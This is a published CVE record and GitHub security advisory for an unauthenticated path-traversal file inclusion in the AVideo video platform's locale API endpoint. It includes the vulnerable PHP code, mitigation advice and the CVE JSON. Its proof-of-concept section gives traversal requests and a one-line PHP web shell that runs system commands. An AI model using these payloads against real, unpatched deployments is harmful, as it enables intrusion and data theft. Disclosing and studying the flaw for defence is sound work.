WWBN AVideo is an open source video platform. In versions up to and including 26.0, an unauthenticated API endpoint (`APIName=locale`) concatenates user input into an `include` path with no canonicalization or whitelist. Path traversal is accepted, so arbitrary PHP files under the web root can be included. In our test this yielded confirmed file disclosure and code execution of existing PHP content (e.g., `view/about.php`), and it *can* escalate to RCE if an attacker can place or control a PHP file elsewhere in the tree. As of time of publication, no patched versions are available.
PUBLISHED5.2CWE-22CWE-98
AVideo has an Unauthenticated Local File Inclusion in API locale (RCE possible with writable PHP)
Problem type
- CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
- CWE-98: Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion')
Affected products
WWBN
AVideo
<= 26.0 - AFFECTED
References
GitHub Security Advisories
GHSA-8fw8-q79c-fp9m
AVideo has an Unauthenticated Local File Inclusion in API locale (RCE possible with writable PHP)
https://github.com/advisories/GHSA-8fw8-q79c-fp9mSummary
An unauthenticated API endpoint (APIName=locale) concatenates user input into an include path with no canonicalization or whitelist. Path traversal is accepted, so arbitrary PHP files under the web root can be included. In our test this yielded confirmed file disclosure and code execution of existing PHP content (e.g., view/about.php), and it can escalate to RCE if an attacker can place or control a PHP file elsewhere in the tree.
Details
- Entry point:
plugin/API/get.json.phpsets$global['bypassSameDomainCheck']=1and merges GET/POST/JSON into$parameterswithout authentication or API secret. - Handler:
plugin/API/API.php, methodget_api_locale()(lines ~5009–5023):
No validation is performed;$parameters['language'] = strtolower($parameters['language']); $file = "{$global['systemRootPath']}locale/{$parameters['language']}.php"; if (!file_exists($file)) { return new ApiObject("This language does not exists"); } include $file;../traversal is accepted. - Because
includeexecutes PHP, any reachable PHP file is executed in the web server context.
PoC
- Fetch an arbitrary PHP file (no auth):
Response returns the rendered About page HTML, proving traversal outsideGET /plugin/API/get.json.php?APIName=locale&language=../view/about HTTP/1.1 Host: <target>locale/. - RCE with an attacker PHP file (any writable PHP path):
IfGET /plugin/API/get.json.php?APIName=locale&language=../videos/locale/shell&x=whoamishell.phpcontains<?php system($_GET['x']); ?>, the response includes command output.
Impact
- Unauthenticated file inclusion of arbitrary PHP files under the web root.
- Confidential data leakage (e.g., configuration, secrets) via included PHP that renders output.
- Potential RCE if any attacker-writable PHP file exists elsewhere (not confirmed in this build).
- Affects any deployment with the API plugin enabled (default in docker-compose).
Mitigation
- Reject path separators/dots and enforce a strict allowlist of locale slugs.
realpaththe target and ensure it stays within$systemRootPath/locale.- Stop using
includefor translations; load data from vetted formats (JSON/array). - Add authentication (API secret/token) to the endpoint as a secondary control.
JSON source
https://cveawg.mitre.org/api/cve/CVE-2026-33513Click to expand
{
"dataType": "CVE_RECORD",
"dataVersion": "5.2",
"cveMetadata": {
"cveId": "CVE-2026-33513",
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"dateUpdated": "2026-03-23T18:21:59.156Z",
"dateReserved": "2026-03-20T16:59:08.891Z",
"datePublished": "2026-03-23T18:21:59.156Z",
"state": "PUBLISHED"
},
"containers": {
"cna": {
"providerMetadata": {
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M",
"dateUpdated": "2026-03-23T18:21:59.156Z"
},
"title": "AVideo has an Unauthenticated Local File Inclusion in API locale (RCE possible with writable PHP)",
"descriptions": [
{
"lang": "en",
"value": "WWBN AVideo is an open source video platform. In versions up to and including 26.0, an unauthenticated API endpoint (`APIName=locale`) concatenates user input into an `include` path with no canonicalization or whitelist. Path traversal is accepted, so arbitrary PHP files under the web root can be included. In our test this yielded confirmed file disclosure and code execution of existing PHP content (e.g., `view/about.php`), and it *can* escalate to RCE if an attacker can place or control a PHP file elsewhere in the tree. As of time of publication, no patched versions are available."
}
],
"affected": [
{
"vendor": "WWBN",
"product": "AVideo",
"versions": [
{
"version": "<= 26.0",
"status": "affected"
}
]
}
],
"problemTypes": [
{
"descriptions": [
{
"lang": "en",
"description": "CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')",
"cweId": "CWE-22",
"type": "CWE"
}
]
},
{
"descriptions": [
{
"lang": "en",
"description": "CWE-98: Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion')",
"cweId": "CWE-98",
"type": "CWE"
}
]
}
],
"references": [
{
"url": "https://github.com/WWBN/AVideo/security/advisories/GHSA-8fw8-q79c-fp9m",
"name": "https://github.com/WWBN/AVideo/security/advisories/GHSA-8fw8-q79c-fp9m",
"tags": [
"x_refsource_CONFIRM"
]
}
],
"metrics": [
{
"cvssV3_1": {
"version": "3.1",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:L",
"attackVector": "NETWORK",
"attackComplexity": "LOW",
"privilegesRequired": "NONE",
"userInteraction": "NONE",
"scope": "UNCHANGED",
"confidentialityImpact": "HIGH",
"integrityImpact": "LOW",
"availabilityImpact": "LOW",
"baseScore": 8.6,
"baseSeverity": "HIGH"
}
}
]
}
}
}